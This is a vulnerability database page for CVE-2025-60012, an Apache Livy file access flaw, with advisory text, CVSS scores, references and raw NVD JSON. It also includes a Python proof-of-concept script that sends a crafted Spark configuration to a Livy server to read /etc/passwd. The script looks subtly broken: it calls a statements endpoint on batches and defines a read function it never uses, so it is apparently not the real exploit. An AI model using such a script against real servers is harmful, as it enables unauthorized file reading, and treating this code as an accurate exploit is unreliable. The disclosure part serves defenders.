CVE-2025-60012

Description

Malicious configuration can lead to unauthorized file access in Apache Livy. This issue affects Apache Livy 0.7.0 and 0.8.0 when connecting to Apache Spark 3.1 or later. A request that includes a Spark configuration value supported from Apache Spark version 3.1 can lead to users gaining access to files they do not have permissions to. For the vulnerability to be exploitable, the user needs to have access to Apache Livy's REST or JDBC interface and be able to send requests with arbitrary Spark configuration values. Users are recommended to upgrade to version 0.9.0 or later, which fixes the issue.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:apache:livy:*:*:*:*:*:*:*:* - VULNERABLE

Apache Livy 0.7.0

Apache Livy 0.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-60012 PoC - Apache Livy Unauthorized File Access
# Target: Apache Livy 0.7.0/0.8.0 with Spark 3.1+

def exploit_livy(target_url, file_path):
    """
    Exploit malicious configuration leading to unauthorized file access
    """
    # Malicious Spark configuration to access arbitrary files
    payload = {
        "file": "file:///" + file_path,
        "conf": {
            "spark.hadoop.fs.defaultFS": "file:///",
            "spark.master": "local[*]"
        }
    }
    
    try:
        # Create new session with malicious config
        response = requests.post(
            f"{target_url}/batches",
            json=payload,
            headers={"Content-Type": "application/json"},
            timeout=30
        )
        
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Batch created: {result.get('id')}")
            return result
        else:
            print(f"[-] Failed: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def read_file_via_livy(target_url, batch_id, file_path):
    """
    Attempt to read file content through Livy session
    """
    code = f"sc.textFile('{file_path}').collect()"
    
    response = requests.post(
        f"{target_url}/batches/{batch_id}/statements",
        json={"code": code},
        headers={"Content-Type": "application/json"}
    )
    
    return response.json()

# Example usage
if __name__ == "__main__":
    target = "http://target-server:8998"
    target_file = "/etc/passwd"
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Attempting to access: {target_file}")
    
    batch = exploit_livy(target, target_file)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60012
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60012
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60012/
[4] VulDB https://vuldb.com/cve/CVE-2025-60012
[5] https://lists.apache.org/thread/gpc85fwrgrbglpk9gm8tmcjzqnctx64w
[6] http://www.openwall.com/lists/oss-security/2026/03/12/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60012", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:52.530", "lastModified": "2026-03-19T17:46:30.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious configuration can lead to unauthorized file access in Apache Livy.\n\nThis issue affects Apache Livy 0.7.0 and 0.8.0 when connecting to Apache Spark 3.1 or later.\n\nA request that includes a Spark configuration value supported from Apache Spark version 3.1 can lead to users gaining access to files they do not have permissions to.\n\nFor the vulnerability to be exploitable, the user needs to have access to Apache Livy's REST or JDBC interface and be able to send requests with arbitrary Spark configuration values.\n\nUsers are recommended to upgrade to version 0.9.0 or later, which fixes the issue."}, {"lang": "es", "value": "La configuración maliciosa puede conducir a un acceso no autorizado a archivos en Apache Livy.\n\nEste problema afecta a Apache Livy 0.7.0 y 0.8.0 al conectarse a Apache Spark 3.1 o posterior.\n\nUna solicitud que incluye un valor de configuración de Spark compatible a partir de la versión 3.1 de Apache Spark puede llevar a que los usuarios obtengan acceso a archivos para los que no tienen permisos.\n\nPara que la vulnerabilidad sea explotable, el usuario necesita tener acceso a la interfaz REST o JDBC de Apache Livy y ser capaz de enviar solicitudes con valores de configuración de Spark arbitrarios.\n\nSe recomienda a los usuarios actualizar a la versión 0.9.0 o posterior, que soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:livy:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.7.0", "versionEndExcluding": "0.9.0", "matchCriteriaId": "D283303C-634D-4FD2-A1E3-37079C6776C6"}]}]}], "references": [{"url": "https://lists.apache.org/thread/gpc85fwrgrbglpk9gm8tmcjzqnctx64w", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/12/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}